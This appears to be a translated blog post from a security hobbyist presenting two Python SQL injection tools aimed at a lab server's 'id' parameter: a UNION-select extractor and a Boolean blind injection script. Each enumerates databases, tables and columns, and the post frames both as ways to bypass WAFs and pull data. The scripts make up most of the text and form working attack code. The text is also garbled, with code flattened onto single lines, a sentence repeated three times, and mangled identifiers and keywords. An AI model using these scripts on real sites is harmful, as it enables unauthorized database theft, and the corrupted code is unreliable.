0 x01 preface
I’ve been thinking about writing an automated injection tool that doesn’t have to be too complicated, but can get database information in the simplest and most direct way, bypassing defenses based on a user-defined payload.
0x02 SQL Injection Tool
A. Joint query
The implementation of union select is the simplest, and the implementation of error injection is basically the same. The main idea is: Get all database names — select database — view all tables in this database — select table — query all column names in this table.
Code details:
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import urllib import re values={} def get(url,values): data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) result=response.content find_list=re.findall(r"qwe~(.+?) ~qwe", result) if len(find_list)>0: return find_list def get_database_name(url): values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA" name_list=get(url,values) print 'The databases:' for i in name_list: print i+" ", print "\n" def table_name(url): database_name=raw_input('please input your database:') values['id'] = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"'"+database_name+"'" name_list=get(url,values) print 'The table is :' for i in name_list: print i+" ", print "\n" def column_name(url): table_name=raw_input('please input your table:') values['id'] = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"'"+table_name+"'" name_list=get(url,values) print 'The column is :' for i in name_list: print i+" ", if __name__ == '__main__': Url = 'http://192.168.106.130/config/sql.php' get_database_name (url) table_name (url) column_name (url)Copy the code
View Code
Operation effect:
B, the blinds
You can write a simple injection script based on a Boolean blind injection script called GET. You can write a simple injection script based on a Boolean blind injection script called GET. You can write a simple injection script based on a Boolean blind injection script called GET.
Obtain the length of each table — obtain the name of each table — obtain the length of each table, column name.
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import urllib import time start_time = time.time() def Database_length (url): values={} for I in range(1,100): values['id'] = "1 and (select length(database()))=%s" %i data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def database_name(url): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} databasename= '' aa = 15 aa = database_length(url) for i in range(1, aa+1): for payload in payloads: values['id'] = "1 and ascii(substring(database(),%s,1))=%s " %(i,ord(payload)) data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: Databasename + = payload return databasename # print database_name def (' http://192.168.125.129/config/sql.php ') Table_count (url,database): values={} for I in range(1,100): values['id'] = "1 and (select count(table_name) from information_schema.tables where table_schema="+"'"+database+"')"+"=%s" %i data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: Return I def table_length(url,a,database): values={} for I in range(1,100): values['id'] = "1 and (select length(table_name) from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1)=%s" %(a,i) data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def table_name(url,database): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} table_name=[] bb = table_count(url,database) for i in range(0,bb+1): user= '' cc=table_length(url,i,database) if cc==None: break for j in range(0,cc+1): for payload in payloads: values['id'] = "1 and ascii(substring((select table_name from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1),%s,1))=%s " %(i,j,ord(payload)) data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: user += payload #print payload table_name.append(user) return table_name #print Table_name (' http://192.168.125.129/config/sql.php ', 'test') def column_count (url, table_name) : Values ={} for I in range(100): values['id'] = "1 and (select count(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+")=%s" %i data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: Return I def column_length(num,url,table_name): values={} for I in range(1,100): limit = " limit %s,1)=%s" %(num,i) values['id'] = "1 and (select length(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+limit data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def column_name(url,table_name): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} column_name=[] dd=column_count(url,table_name) for i in range(0,dd+1): user= '' bb=column_length(i,url,table_name) if bb==None: break for j in range(0,bb+1): for payload in payloads: limit=" limit %s,1),%s,1))=%s" %(i,j,ord(payload)) values['id'] = "1 and ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit data = urllib.urlencode(values) geturl = url+'? '+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: user += payload column_name.append(user) return column_name #print Column_name (' http://192.168.125.129/config/sql.php 'and' admin ') if __name__ = = "__main__" : Url = 'http://192.168.125.129/config/sql.php' databasename = database_name (url) print "The current database:" + databasename database=raw_input("Please input your databasename: ") tables=table_name(url,database) print database+" have the tables:", print tables for table in tables: print table+" have the columns:" print column_name(url,table) print 'Use for: %d second' % (time.time() - start_time)Copy the code
View Code
Operation effect:
0x03 END
By writing a simple SQL injection script to obtain data, the script is very simple to achieve, the expansion space is also large, only for the simplest way to Bypass WAF data acquisition.
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.